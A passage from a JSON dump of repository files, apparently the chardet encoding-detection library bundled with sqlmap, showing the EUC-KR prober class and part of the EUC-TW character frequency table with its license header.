    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .chardistribution import EUCKRDistributionAnalysis\nfrom .mbcssm import EUCKR_SM_MODEL\n\n\nclass EUCKRProber(MultiByteCharSetProber):\n    def __init__(self):\n        super(EUCKRProber, self).__init__()\n        self.coding_sm = CodingStateMachine(EUCKR_SM_MODEL)\n        self.distribution_analyzer = EUCKRDistributionAnalysis()\n        self.reset()\n\n    @property\n    def charset_name(self):\n        return \"EUC-KR\"\n\n    @property\n    def language(self):\n        return \"Korean\"\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/euctwfreq.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# EUCTW frequency table\n# Converted from big5 work\n# by Taiwan's Mandarin Promotion Council\n# <http:#www.edu.tw:81/mandr/>\n\n# 128  --> 0.42261\n# 256  --> 0.57851\n# 512  --> 0.74851\n# 1024 --> 0.89384\n# 2048 --> 0.97583\n#\n# Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98\n# Random Distribution Ration = 512/(5401-512)=0.105\n#\n# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR\n\nEUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75\n\n# Char to FreqOrder table ,\nEUCTW_TABLE_SIZE = 5376\n\nEUCTW_CHAR_TO_FREQ_ORDER = (\n   1,1800,1506, 255,1431, 198,   9,  82,   6,7310, 177, 202,3615,1256,2808, 110,  # 2742\n3735,  33,3241, 261,  76,  44,2113,  16,2931,2184,1176, 659,3868,  26,3404,2643,  # 2758\n1198,3869,3313,4060, 410,2211, 302, 590, 361,1963,   8, 204,  58,4296,7311,1931,  # 2774\n  63,7312,7313, 317,1614,  75, 222, 159,4061,2412,1480,7314,3500,3068, 224,2809,  # 2790\n3616,   3,  10,3870,1471,  29,2774,1135,2852,1939, 873, 130,3242,1123, 312,7315,  # 2806\n4297,2051, 507, 252, 682,7316, 142,1914, 124, 206,2932,  34,3501,3173,  64, 604,  # 2822\n7317,2494,1976,1977, 155,1990, 645, 641,1606,7318,3405, 337,  72, 406,7319,  80,  # 2838\n 630, 238,3174,1509, 263, 939,1092,2644, 756,1440,1094,3406, 449,  69,2969, 591,  # 2854\n 179,2095, 471, 115,2034,1843,  60,  50,2970, 134, 806,1868, 734,2035,3407, 180,  # 2870\n 995,1607, 156, 537,2893, 688,7320, 319,1305, 779,2144, 514,2374, 298,4298, 359,  # 2886\n2495,  90,2707,1338, 663,  11, 906,1099,2545,  20,2436, 182, 532,1716,7321, 732,  # 2902\n1376,4062,1311,1420,3175,  25,2312,1056, 113, 399, 382,1949, 242,3408,2467, 529,  # 2918\n3243, 475,1447,3617,7322, 117,  21, 656, 810,1297,2295,2329,3502,7323, 126,4063,  # 2934\n 706, 456, 150, 613,4299,  71,1118,2036,4064, 145,3069,  85, 835, 486,2114,1246,  # 2950\n1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,7324,2127,2354, 347,3736, 221,  # 2966\n3503,3110,7325,1955,1153,4065,  83, 296,1199,3070, 192, 624,  93,7326, 822,1897,  # 2982\n2810,3111, 795,2064, 991,1554,1542,1592,  27,  43,2853, 859, 139,1456, 860,4300,  # 2998\n 437, 712,3871, 164,2392,3112, 695, 211,3017,2096, 195,3872,1608,3504,3505,3618,  # 3014\n3873, 234, 811,2971,2097,3874,2229,1441,3506,1615,2375, 668,2076,1638, 305, 228,  # 3030\n1664,4301, 467, 415,7327, 262,2098,1593, 239, 108, 300, 200,1033, 512,1247,2077,  # 3046\n7328,7329,2173,3176,3619,2673, 593, 845,1062,3244,  88,1723,2037,3875,1950, 212,  # 3062\n 266, 152, 149, 468,1898,4066,4302,  77, 187,7330,3018,  37,   5,2972,7331,3876,  # 3078\n7332,7333,  39,2517,4303,2894,3177,2078,  55, 148,  74,4304, 545, 483,1474,1029,  # 3094\n1665, 217,1869,1531,3113,1104,2645,4067,  24, 172,3507, 900,3877,3508,3509,4305,  # 3110\n  32,1408,2811,1312, 329, 487,2355,2247,2708, 784,2674,   4,3019,3314,1427,1788,  # 3126\n 188, 109, 499,7334,3620,1717,1789, 888,1217,3020,4306,7335,3510,7336,3315,1520,  # 3142\n3621,3878, 196,1034, 775,7337,7338, 929,1815, 249, 439,  38,7339,1063,7340, 794,  # 3158\n3879,1435,2296,  46, 178,3245,2065,7341,2376,7342, 214,1709,4307, 804,  35, 707,  # 3174\n 324,3622,1601,2546, 140, 459,4068,7343,7344,1365, 839, 272, 978,2257,2572,3409,  # 3190\n2128,1363,3623,1423, 697, 100,3071,  48,  70,1231, 495,3114,2193,7345,1294,7346,  # 3206\n2079, 462, 586,1042,3246, 853, 256, 988, 185,2377,3410,1698, 434,1084,7347,3411,  # 3222\n 314,2615,2775,4308,2330,2331, 569,2280, 637,1816,2518, 757,1162,1878,1616,3412,  # 3238\n 287,1577,2115, 768,4309,1671,2854,3511,2519,1321,3737, 909,2413,7348,4069, 933,  # 3254\n3738,7349,2052,2356,1222,4310, 765,2414,1322, 786,4311,7350,1919,1462,1677,2895,  # 3270\n1699,7351,4312,1424,2437,3115,3624,2590,3316,1774,1940,3413,3880,4070, 309,1369,  # 3286\n1130,2812, 364,2230,1653,1299,3881,3512,3882,3883,2646, 525,1085,3021, 902,2000,  # 3302\n1475, 964,4313, 421,1844,1415,1057,2281, 940,1364,3116, 376,4314,4315,1381,   7,  # 3318\n2520, 983,2378, 336,1710,2675,1845, 321,3414, 559,1131,3022,2742,1808,1132,1313,  # 3334\n 265,1481,1857,7352, 352,1203,2813,3247, 167,1089, 420,2814, 776, 792,1724,3513,  # 3350\n4071,2438,3248,7353,4072,7354, 446, 229, 333,2743, 901,3739,1200,1557,4316,2647,  # 3366\n1920, 395,2744,2676,3740,4073,1835, 125, 916,3178,2616,4317,7355,7356,3741,7357,  # 3382\n7358,7359,4318,3117,3625,1133,2547,1757,3415,1510,2313,1409,3514,7360,2145, 438,  # 3398\n2591,2896,2379,3317,1068, 958,3023, 461, 311,2855,2677,4074,1915,3179,4075,1978,  # 3414\n 383, 750,2745,2617,4076, 274, 539, 385,1278,1442,7361,1154,1964, 384, 561, 210,  # 3430\n  98,1295,2548,3515,7362,1711,2415,1482,3416,3884,2897,1257, 129,7363,3742, 642,  # 3446\n 523,2776,2777,2648,7364, 141,2231,1333,  68, 176, 441, 876, 907,4077, 603,2592,  # 3462\n 710, 171,3417, 404, 549,  18,3118,2393,1410,3626,1666,7365,3516,4319,2898,4320,  # 3478\n7366,2973, 368,7367, 146, 366,  99, 871,3627,1543, 748, 807,1586,1185,  22,2258,  # 3494\n 379,3743,3180,7368,3181, 505,1941,2618,1991,1382,2314,7369, 380,2357, 218, 702,  # 3510\n1817,1248,3418,3024,3517,3318,3249,7370,2974,3628, 930,3250,3744,7371,  59,7372,  # 3526\n 585, 601,4078, 497,3419,1112,1314,4321,1801,7373,1223,1472,2174,7374, 749,1836,  # 3542\n 690,1899,3745,1772,3885,1476, 429,1043,1790,2232,2116, 917,4079, 447,1086,1629,  # 3558\n7375, 556,7376,7377,2020,1654, 844,1090, 105, 550, 966,1758,2815,1008,1782, 686,  # 3574\n1095,7378,2282, 793,1602,7379,3518,2593,4322,4080,2933,2297,4323,3746, 980,2496,  # 3590\n 544, 353, 527,4324, 908,2678,2899,7380, 381,2619,1942,1348,7381,1341,1252, 560,  # 3606\n3072,7382,3420,2856,7383,2053, 973, 886,2080, 143,4325,7384,7385, 157,3886, 496,  # 3622\n4081,  57, 840, 540,2038,4326,4327,3421,2117,1445, 970,2259,1748,1965,2081,4082,  # 3638\n3119,1234,1775,3251,2816,3629, 773,1206,2129,1066,2039,1326,3887,1738,1725,4083,  # 3654\n 279,3120,  51,1544,2594, 423,1578,2130,2066, 173,4328,1879,7386,7387,1583, 264,  # 3670\n 610,3630,4329,2439, 280, 154,7388,7389,7390,1739, 338,1282,3073, 693,2857,1411,  # 3686\n1074,3747,2440,7391,4330,7392,7393,1240, 952,2394,7394,2900,1538,2679, 685,1483,  # 3702\n4084,2468,1436, 953,4085,2054,4331, 671,2395,  79,4086,2441,3252, 608, 567,2680,  # 3718\n3422,4087,4088,1691, 393,1261,1791,2396,7395,4332,7396,7397,7398,7399,1383,1672,  # 3734\n3748,3182,1464, 522,1119, 661,1150, 216, 675,4333,3888,1432,3519, 609,4334,2681,  # 3750\n2397,7400,7401,7402,4089,3025,   0,7403,2469, 315, 231,2442, 301,3319,4335,2380,  # 3766\n7404, 233,4090,3631,1818,4336,4337,7405,  96,1776,1315,2082,7406, 257,7407,1809,  # 3782\n3632,2709,1139,1819,4091,2021,1124,2163,2778,1777,2649,7408,3074, 363,1655,3183,  # 3798\n7409,2975,7410,7411,7412,3889,1567,3890, 718, 103,3184, 849,1443, 341,3320,2934,  # 3814\n1484,7413,1712, 127,  67, 339,4092,2398, 679,1412, 821,7414,7415, 834, 738, 351,  # 3830\n2976,2146, 846, 235,1497,1880, 418,1992,3749,2710, 186,1100,2147,2746,3520,1545,  # 3846\n1355,2935,2858,1377, 583,3891,4093,2573,2977,7416,1298,3633,1078,2549,3634,2358,  # 3862\n  78,3750,3751, 267,1289,2099,2001,1594,4094, 348, 369,1274,2194,2175,1837,4338,  # 3878\n1820,2817,3635,2747,2283,2002,4339,2936,2748, 144,3321, 882,4340,3892,2749,3423,  # 3894\n4341,2901,7417,4095,1726, 320,7418,3893,3026, 788,2978,7419,2818,1773,1327,2859,  # 3910\n3894,2819,7420,1306,4342,2003,1700,3752,3521,2359,2650, 787,2022, 506, 824,3636,  # 3926\n 534, 323,4343,1044,3322,2023,1900, 946,3424,7421,1778,1500,1678,7422,1881,4344,  # 3942\n 165, 243,4345,3637,2521, 123, 683,4096, 764,4346,  36,3895,1792, 589,2902, 816,  # 3958\n 626,1667,3027,2233,1639,1555,1622,3753,3896,7423,3897,2860,1370,1228,1932, 891,  # 3974\n2083,2903, 304,4097,7424, 292,2979,2711,3522, 691,2100,4098,1115,4347, 118, 662,  # 3990\n7425, 611,1156, 854,2381,1316,2861,   2, 386, 515,2904,7426,7427,3253, 868,2234,  # 4006\n1486, 855,2651, 785,2212,3028,7428,1040,3185,3523,7429,3121, 448,7430,1525,7431,  # 4022\n2164,4348,7432,3754,7433,4099,2820,3524,3122, 503, 818,3898,3123,1568, 814, 676,  # 4038\n1444, 306,1749,7434,3755,1416,1030, 197,1428, 805,2821,1501,4349,7435,7436,7437,  # 4054\n1993,7438,4350,7439,7440,2195,  13,2779,3638,2980,3124,1229,1916,7441,3756,2131,  # 4070\n7442,4100,4351,2399,3525,7443,2213,1511,1727,1120,7444,7445, 646,3757,2443, 307,  # 4086\n7446,7447,1595,3186,7448,7449,7450,3639,1113,1356,3899,1465,2522,2523,7451, 519,  # 4102\n7452, 128,2132,  92,2284,1979,7453,3900,1512, 342,3125,2196,7454,2780,2214,1980,  # 4118\n3323,7455, 290,1656,1317, 789, 827,2360,7456,3758,4352, 562, 581,3901,7457, 401,  # 4134\n4353,2248,  94,4354,1399,2781,7458,1463,2024,4355,3187,1943,7459, 828,1105,4101,  # 4150\n1262,1394,7460,4102, 605,4356,7461,1783,2862,7462,2822, 819,2101, 578,2197,2937,  # 4166\n7463,1502, 436,3254,4103,3255,2823,3902,2905,3425,3426,7464,2712,2315,7465,7466,  # 4182\n2332,2067,  23,4357, 193, 826,3759,2102, 699,1630,4104,3075, 390,1793,1064,3526,  # 4198\n7467,1579,3076,3077,1400,7468,4105,1838,1640,2863,7469,4358,4359, 137,4106, 598,  # 4214\n3078,1966, 780, 104, 974,2938,7470, 278, 899, 253, 402, 572, 504, 493,1339,7471,  # 4230\n3903,1275,4360,2574,2550,7472,3640,3029,3079,2249, 565,1334,2713, 863,  41,7473,  # 4246\n7474,4361,7475,1657,2333,  19, 463,2750,4107, 606,7476,2981,3256,1087,2084,1323,  # 4262\n2652,2982,7477,1631,1623,1750,4108,2682,7478,2864, 791,2714,2653,2334, 232,2416,  # 4278\n7479,2983,1498,7480,2654,2620, 755,1366,3641,3257,3126,2025,1609, 119,1917,3427,  # 4294\n 862,1026,4109,7481,3904,3760,4362,3905,4363,2260,1951,2470,7482,1125, 817,4110,  # 4310\n4111,3906,1513,1766,2040,1487,4112,3030,3258,2824,3761,3127,7483,7484,1507,7485,  # 4326\n2683, 733,  40,1632,1106,2865, 345,4113, 841,2524, 230,4364,2984,1846,3259,3428,  # 4342\n7486,1263, 986,3429,7487, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562,3907,  # 4358\n3908,2939, 967,2751,2655,1349, 592,2133,1692,3324,2985,1994,4114,1679,3909,1901,  # 4374\n2185,7488, 739,3642,2715,1296,1290,7489,4115,2198,2199,1921,1563,2595,2551,1870,  # 4390\n2752,2986,7490, 435,7491, 343,1108, 596,  17,1751,4365,2235,3430,3643,7492,4366,  # 4406\n 294,3527,2940,1693, 477, 979, 281,2041,3528, 643,2042,3644,2621,2782,2261,1031,  # 4422\n2335,2134,2298,3529,4367, 367,1249,2552,7493,3530,7494,4368,1283,3325,2004, 240,  # 4438\n1762,3326,4369,4370, 836,1069,3128, 474,7495,2148,2525, 268,3531,7496,3188,1521,  # 4454\n1284,7497,1658,1546,4116,7498,3532,3533,7499,4117,3327,2684,1685,4118, 961,1673,  # 4470\n2622, 190,2005,2200,3762,4371,4372,7500, 570,2497,3645,1490,7501,4373,2623,3260,  # 4486\n1956,4374, 584,1514, 396,1045,1944,7502,4375,1967,2444,7503,7504,4376,3910, 619,  # 4502\n7505,3129,3261, 215,2006,2783,2553,3189,4377,3190,4378, 763,4119,3763,4379,7506,  # 4518\n7507,1957,1767,2941,3328,3646,1174, 452,1477,4380,3329,3130,7508,2825,1253,2382,  # 4534\n2186,1091,2285,4120, 492,7509, 638,1169,1824,2135,1752,3911, 648, 926,1021,1324,  # 4550\n4381, 520,4382, 997, 847,1007, 892,4383,3764,2262,1871,3647,7510,2400,1784,4384,  # 4566\n1952,2942,3080,3191,1728,4121,2043,3648,4385,2007,1701,3131,1551,  30,2263,4122,  # 4582\n7511,2026,4386,3534,7512, 501,7513,4123, 594,3431,2165,1821,3535,3432,3536,3192,  # 4598\n 829,2826,4124,7514,1680,3132,1225,4125,7515,3262,4387,4126,3133,2336,7516,4388,  # 4614\n4127,7517,3912,3913,7518,1847,2383,2596,3330,7519,4389, 374,3914, 652,4128,4129,  # 4630\n 375,1140, 798,7520,7521,7522,2361,4390,2264, 546,1659, 138,3031,2445,4391,7523,  # 4646\n2250, 612,1848, 910, 796,3765,1740,1371, 825,3766,3767,7524,2906,2554,7525, 692,  # 4662\n 444,3032,2624, 801,4392,4130,7526,1491, 244,1053,3033,4131,4132, 340,7527,3915,  # 4678\n1041,2987, 293,1168,  87,1357,7528,1539, 959,7529,2236, 721, 694,4133,3768, 219,  # 4694\n1478, 644,1417,3331,2656,1413,1401,1335,1389,3916,7530,7531,2988,2362,3134,1825,  # 4710\n 730,1515, 184,2827,  66,4393,7532,1660,2943, 246,3332, 378,1457, 226,3433, 975,  # 4726\n3917,2944,1264,3537, 674, 696,7533, 163,7534,1141,2417,2166, 713,3538,3333,4394,  # 4742\n3918,7535,7536,1186,  15,7537,1079,1070,7538,1522,3193,3539, 276,1050,2716, 758,  # 4758\n1126, 653,2945,3263,7539,2337, 889,3540,3919,3081,2989, 903,1250,4395,3920,3434,  # 4774\n3541,1342,1681,1718, 766,3264, 286,  89,2946,3649,7540,1713,7541,2597,3334,2990,  # 4790\n7542,2947,2215,3194,2866,7543,4396,2498,2526, 181, 387,1075,3921, 731,2187,3335,  # 4806\n7544,3265, 310, 313,3435,2299, 770,4134,  54,3034, 189,4397,3082,3769,3922,7545,  # 4822\n1230,1617,1849, 355,3542,4135,4398,3336, 111,4136,3650,1350,3135,3436,3035,4137,  # 4838\n2149,3266,3543,7546,2784,3923,3924,2991, 722,2008,7547,1071, 247,1207,2338,2471,  # 4854\n1378,4399,2009, 864,1437,1214,4400, 373,3770,1142,2216, 667,4401, 442,2753,2555,  # 4870\n3771,3925,1968,4138,3267,1839, 837, 170,1107, 934,1336,1882,7548,7549,2118,4139,  # 4886\n2828, 743,1569,7550,4402,4140, 582,2384,1418,3437,7551,1802,7552, 357,1395,1729,  # 4902\n3651,3268,2418,1564,2237,7553,3083,3772,1633,4403,1114,2085,4141,1532,7554, 482,  # 4918\n2446,4404,7555,7556,1492, 833,1466,7557,2717,3544,1641,2829,7558,1526,1272,3652,  # 4934\n4142,1686,1794, 416,2556,1902,1953,1803,7559,3773,2785,3774,1159,2316,7560,2867,  # 4950\n4405,1610,1584,3036,2419,2754, 443,3269,1163,3136,7561,7562,3926,7563,4143,2499,  # 4966\n3037,4406,3927,3137,2103,1647,3545,2010,1872,4144,7564,4145, 431,3438,7565, 250,  # 4982\n  97,  81,4146,7566,1648,1850,1558, 160, 848,7567, 866, 740,1694,7568,2201,2830,  # 4998\n3195,4147,4407,3653,1687, 950,2472, 426, 469,3196,3654,3655,3928,7569,7570,1188,  # 5014\n 424,1995, 861,3546,4148,3775,2202,2685, 168,1235,3547,4149,7571,2086,1674,4408,  # 5030\n3337,3270, 220,2557,1009,7572,3776, 670,2992, 332,1208, 717,7573,7574,3548,2447,  # 5046\n3929,3338,7575, 513,7576,1209,2868,3339,3138,4409,1080,7577,7578,7579,7580,2527,  # 5062\n3656,3549, 815,1587,3930,3931,7581,3550,3439,3777,1254,4410,1328,3038,1390,3932,  # 5078\n1741,3933,3778,3934,7582, 236,3779,2448,3271,7583,7584,3657,3780,1273,3781,4411,  # 5094\n7585, 308,7586,4412, 245,4413,1851,2473,1307,2575, 430, 715,2136,2449,7587, 270,  # 5110\n 199,2869,3935,7588,3551,2718,1753, 761,1754, 725,1661,1840,4414,3440,3658,7589,  # 5126\n7590, 587,  14,3272, 227,2598, 326, 480,2265, 943,2755,3552, 291, 650,1883,7591,  # 5142\n1702,1226, 102,1547,  62,3441, 904,4415,3442,1164,4150,7592,7593,1224,1548,2756,  # 5158\n 391, 498,1493,7594,1386,1419,7595,2055,1177,4416, 813, 880,1081,2363, 566,1145,  # 5174\n4417,2286,1001,1035,2558,2599,2238, 394,1286,7596,7597,2068,7598,  86,1494,1730,  # 5190\n3936, 491,1588, 745, 897,2948, 843,3340,3937,2757,2870,3273,1768, 998,2217,2069,  # 5206\n 397,1826,1195,1969,3659,2993,3341, 284,7599,3782,2500,2137,2119,1903,7600,3938,  # 5222\n2150,3939,4151,1036,3443,1904, 114,2559,4152, 209,1527,7601,7602,2949,2831,2625,  # 5238\n2385,2719,3139, 812,2560,7603,3274,7604,1559, 737,1884,3660,1210, 885,  28,2686,  # 5254\n3553,3783,7605,4153,1004,1779,4418,7606, 346,1981,2218,2687,4419,3784,1742, 797,  # 5270\n1642,3940,1933,1072,1384,2151, 896,3941,3275,3661,3197,2871,3554,7607,2561,1958,  # 5286\n4420,2450,1785,7608,7609,7610,3942,4154,1005,1308,3662,4155,2720,4421,4422,1528,  # 5302\n2600, 161,1178,4156,1982, 987,4423,1101,4157, 631,3943,1157,3198,2420,1343,1241,  # 5318\n1016,2239,2562, 372, 877,2339,2501,1160, 555,1934, 911,3944,7611, 466,1170, 169,  # 5334\n1051,2907,2688,3663,2474,2994,1182,2011,2563,1251,2626,7612, 992,2340,3444,1540,  # 5350\n2721,1201,2070,2401,1996,2475,7613,4424, 528,1922,2188,1503,1873,1570,2364,3342,  # 5366\n3276,7614, 557,1073,7615,1827,3445,2087,2266,3140,3039,3084, 767,3085,2786,4425,  # 5382\n1006,4158,4426,2341,1267,2176,3664,3199, 778,3945,3200,2722,1597,2657,7616,4427,  # 5398\n7617,3446,7618,7619,7620,3277,2689,1433,3278, 131,  95,1504,3946, 723,4159,3141,  # 5414\n1841,3555,2758,2189,3947,2027,2104,3665,7621,2995,3948,1218,7622,3343,3201,3949,  # 5430\n4160,2576, 248,1634,3785, 912,7623,2832,3666,3040,3786, 654,  53,7624,2996,7625,  # 5446\n1688,4428, 777,3447,1032,3950,1425,7626, 191, 820,2120,2833, 971,4429, 931,3202,  # 5462\n 135, 664, 783,3787,1997, 772,2908,1935,3951,3788,4430,2909,3203, 282,2723, 640,  # 5478\n1372,3448,1127, 922, 325,3344,7627,7628, 711,2044,7629,7630,3952,2219,2787,1936,  # 5494\n3953,3345,2220,2251,3789,2300,7631,4431,3790,1258,3279,3954,3204,2138,2950,3955,  # 5510\n3956,7632,2221, 258,3205,4432, 101,1227,7633,3280,1755,7634,1391,3281,7635,2910,  # 5526\n2056, 893,7636,7637,7638,1402,4161,2342,7639,7640,3206,3556,7641,7642, 878,1325,  # 5542\n1780,2788,4433, 259,1385,2577, 744,1183,2267,4434,7643,3957,2502,7644, 684,1024,  # 5558\n4162,7645, 472,3557,3449,1165,3282,3958,3959, 322,2152, 881, 455,1695,1152,1340,  # 5574\n 660, 554,2153,4435,1058,4436,4163, 830,1065,3346,3960,4437,1923,7646,1703,1918,  # 5590\n7647, 932,2268, 122,7648,4438, 947, 677,7649,3791,2627, 297,1905,1924,2269,4439,  # 5606\n2317,3283,7650,7651,4164,7652,4165,  84,4166, 112, 989,7653, 547,1059,3961, 701,  # 5622\n3558,1019,7654,4167,7655,3450, 942, 639, 457,2301,2451, 993,2951, 407, 851, 494,  # 5638\n4440,3347, 927,7656,1237,7657,2421,3348, 573,4168, 680, 921,2911,1279,1874, 285,  # 5654\n 790,1448,1983, 719,2167,7658,7659,4441,3962,3963,1649,7660,1541, 563,7661,1077,  # 5670\n7662,3349,3041,3451, 511,2997,3964,3965,3667,3966,1268,2564,3350,3207,4442,4443,  # 5686\n7663, 535,1048,1276,1189,2912,2028,3142,1438,1373,2834,2952,1134,2012,7664,4169,  # 5702\n1238,2578,3086,1259,7665, 700,7666,2953,3143,3668,4170,7667,4171,1146,1875,1906,  # 5718\n4444,2601,3967, 781,2422, 132,1589, 203, 147, 273,2789,2402, 898,1786,2154,3968,  # 5734\n3969,7668,3792,2790,7669,7670,4445,4446,7671,3208,7672,1635,3793, 965,7673,1804,  # 5750\n2690,1516,3559,1121,1082,1329,3284,3970,1449,3794,  65,1128,2835,2913,2759,1590,  # 5766\n3795,7674,7675,  12,2658,  45, 976,2579,3144,4447, 517,2528,1013,1037,3209,7676,  # 5782\n3796,2836,7677,3797,7678,3452,7679,2602, 614,1998,2318,3798,3087,2724,2628,7680,  # 5798\n2580,4172, 599,1269,7681,1810,3669,7682,2691,3088, 759,1060, 489,1805,3351,3285,  # 5814\n1358,7683,7684,2386,1387,1215,2629,2252, 490,7685,7686,4173,1759,2387,2343,7687,  # 5830\n4448,3799,1907,3971,2630,1806,3210,4449,3453,3286,2760,2344, 874,7688,7689,3454,  # 5846\n3670,1858,  91,2914,3671,3042,3800,4450,7690,3145,3972,2659,7691,3455,1202,1403,  # 5862\n3801,2954,2529,1517,2503,4451,3456,2504,7692,4452,7693,2692,1885,1495,1731,3973,  # 5878\n2365,4453,7694,2029,7695,7696,3974,2693,1216, 237,2581,4174,2319,3975,3802,4454,  # 5894\n4455,2694,3560,3457, 445,4456,7697,7698,7699,7700,2761,  61,3976,3672,1822,3977,  # 5910\n7701, 687,2045, 935, 925, 405,2660, 703,1096,1859,2725,4457,3978,1876,1367,2695,  # 5926\n3352, 918,2105,1781,2476, 334,3287,1611,1093,4458, 564,3146,3458,3673,3353, 945,  # 5942\n2631,2057,4459,7702,1925, 872,4175,7703,3459,2696,3089, 349,4176,3674,3979,4460,  # 5958\n3803,4177,3675,2155,3980,4461,4462,4178,4463,2403,2046, 782,3981, 400, 251,4179,  # 5974\n1624,7704,7705, 277,3676, 299,1265, 476,1191,3804,2121,4180,4181,1109, 205,7706,  # 5990\n2582,1000,2156,3561,1860,7707,7708,7709,4464,7710,4465,2565, 107,2477,2157,3982,  # 6006\n3460,3147,7711,1533, 541,1301, 158, 753,4182,2872,3562,7712,1696, 370,1088,4183,  # 6022\n4466,3563, 579, 327, 440, 162,2240, 269,1937,1374,3461, 968,3043,  56,1396,3090,  # 6038\n2106,3288,3354,7713,1926,2158,4467,2998,7714,3564,7715,7716,3677,4468,2478,7717,  # 6054\n2791,7718,1650,4469,7719,2603,7720,7721,3983,2661,3355,1149,3356,3984,3805,3985,  # 6070\n7722,1076,  49,7723, 951,3211,3289,3290, 450,2837, 920,7724,1811,2792,2366,4184,  # 6086\n1908,1138,2367,3806,3462,7725,3212,4470,1909,1147,1518,2423,4471,3807,7726,4472,  # 6102\n2388,2604, 260,1795,3213,7727,7728,3808,3291, 708,7729,3565,1704,7730,3566,1351,  # 6118\n1618,3357,2999,1886, 944,4185,3358,4186,3044,3359,4187,7731,3678, 422, 413,1714,  # 6134\n3292, 500,2058,2345,4188,2479,7732,1344,1910, 954,7733,1668,7734,7735,3986,2404,  # 6150\n4189,3567,3809,4190,7736,2302,1318,2505,3091, 133,3092,2873,4473, 629,  31,2838,  # 6166\n2697,3810,4474, 850, 949,4475,3987,2955,1732,2088,4191,1496,1852,7737,3988, 620,  # 6182\n3214, 981,1242,3679,3360,1619,3680,1643,3293,2139,2452,1970,1719,3463,2168,7738,  # 6198\n3215,7739,7740,3361,1828,7741,1277,4476,1565,2047,7742,1636,3568,3093,7743, 869,  # 6214\n2839, 655,3811,3812,3094,3989,3000,3813,1310,3569,4477,7744,7745,7746,1733, 558,  # 6230\n4478,3681, 335,1549,3045,1756,4192,3682,1945,3464,1829,1291,1192, 470,2726,2107,  # 6246\n2793, 913,1054,3990,7747,1027,7748,3046,3991,4479, 982,2662,3362,3148,3465,3216,  # 6262\n3217,1946,2794,7749, 571,4480,7750,1830,7751,3570,2583,1523,2424,7752,2089, 984,  # 6278\n4481,3683,1959,7753,3684, 852, 923,2795,3466,3685, 969,1519, 999,2048,2320,1705,  # 6294\n7754,3095, 615,1662, 151, 597,3992,2405,2321,1049, 275,4482,3686,4193, 568,3687,  # 6310\n3571,2480,4194,3688,7755,2425,2270, 409,3218,7756,1566,2874,3467,1002, 769,2840,  # 6326\n 194,2090,3149,3689,2222,3294,4195, 628,1505,7757,7758,1763,2177,3001,3993, 521,  # 6342\n1161,2584,1787,2203,2406,4483,3994,1625,4196,4197, 412,  42,3096, 464,7759,2632,  # 6358\n4484,3363,1760,1571,2875,3468,2530,1219,2204,3814,2633,2140,2368,4485,4486,3295,  # 6374\n1651,3364,3572,7760,7761,3573,2481,3469,7762,3690,7763,7764,2271,2091, 460,7765,  # 6390\n4487,7766,3002, 962, 588,3574, 289,3219,2634,1116,  52,7767,3047,1796,7768,7769,  # 6406\n7770,1467,7771,1598,1143,3691,4198,1984,1734,1067,4488,1280,3365, 465,4489,1572,  # 6422\n 510,7772,1927,2241,1812,1644,3575,7773,4490,3692,7774,7775,2663,1573,1534,7776,  # 6438\n7777,4199, 536,1807,1761,3470,3815,3150,2635,7778,7779,7780,4491,3471,2915,1911,  # 6454\n2796,7781,3296,1122, 377,3220,7782, 360,7783,7784,4200,1529, 551,7785,2059,3693,  # 6470\n1769,2426,7786,2916,4201,3297,3097,2322,2108,2030,4492,1404, 136,1468,1479, 672,  # 6486\n1171,3221,2303, 271,3151,7787,2762,7788,2049, 678,2727, 865,1947,4493,7789,2013,  # 6502\n3995,2956,7790,2728,2223,1397,3048,3694,4494,4495,1735,2917,3366,3576,7791,3816,  # 6518\n 509,2841,2453,2876,3817,7792,7793,3152,3153,4496,4202,2531,4497,2304,1166,1010,  # 6534\n 552, 681,1887,7794,7795,2957,2958,3996,1287,1596,1861,3154, 358, 453, 736, 175,  # 6550\n 478,1117, 905,1167,1097,7796,1853,1530,7797,1706,7798,2178,3472,2287,3695,3473,  # 6566\n3577,4203,2092,4204,7799,3367,1193,2482,4205,1458,2190,2205,1862,1888,1421,3298,  # 6582\n2918,3049,2179,3474, 595,2122,7800,3997,7801,7802,4206,1707,2636, 223,3696,1359,  # 6598\n 751,3098, 183,3475,7803,2797,3003, 419,2369, 633, 704,3818,2389, 241,7804,7805,  # 6614\n7806, 